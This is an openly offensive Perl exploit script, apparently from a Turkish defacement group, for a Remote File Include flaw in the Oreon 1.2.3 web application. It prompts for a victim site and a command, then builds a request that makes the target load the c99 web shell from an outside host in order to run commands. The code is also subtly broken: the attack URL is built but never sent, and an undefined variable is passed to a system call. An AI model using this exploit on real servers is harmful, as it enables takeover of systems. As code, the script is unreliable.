#[ Coded : H0tTurk-] #[ Author: DrmaxVirus #[ web app : Oreon1.2.3 Remote File İnclude ] #[ My Site : WwW.H0tTurk.CoM ] #[Referance:http://www.milw0rm.com/exploits/3150 #[ Thanx : DrmaxVirus,GencTurk,Madconfig,EnjexioN,TiT,Kurtefendy,LuciferCihan,Arabian-FighterZ,Sawturk,Ayyildiz,OzelHarekatTim f4cked238 ] $rfi = "index.php?file="; $path = "/"; $shell = "http://redhat.by.ru/c99.txt?cmd="; print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil); if($dil eq "English"){ print "(c) H0tTurk\n"; &ex; } elsif($dil eq "Turkce"){ print "H0tTurk\n"; &ex; } else {print "Selection Language\n"; exit;} sub ex{ $not = "Victim is Not Zox.\n" and $not_cmd = "Not Doing xpl.\n" and $vic = "Shell Adress? with start http:// :" and $thx = "Yeah " and $diz = "Dictionary?:" and $komt = "Command?:" if $dil eq "English"; $not = "Not Found\n" and $not_cmd = "Error Rfi\n" and $vic = "Example http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "eyw " and $komt = "Command?:" if $dil eq "Turkce"; print "$vic"; $victim = <STDIN>; chop($victim); print "$diz"; $dizn = <STDIN>; chop($dizn); $dizin = $dizn; $dizin = "/" if !$dizn; print "$komt"; $cmd = <STDIN>; chop($cmd); $cmmd = $cmd; $cmmd = "dir" if !$cmd; $site = $victim; $site = "http://$victim" if !($victim =~ /http/); $acacaz = "$site$dizin$rfi$shell$cmmd"; print "(c) H0tTurk AyT\n$g3rt: Drmax\n"; sleep 3; system("start $wait"); }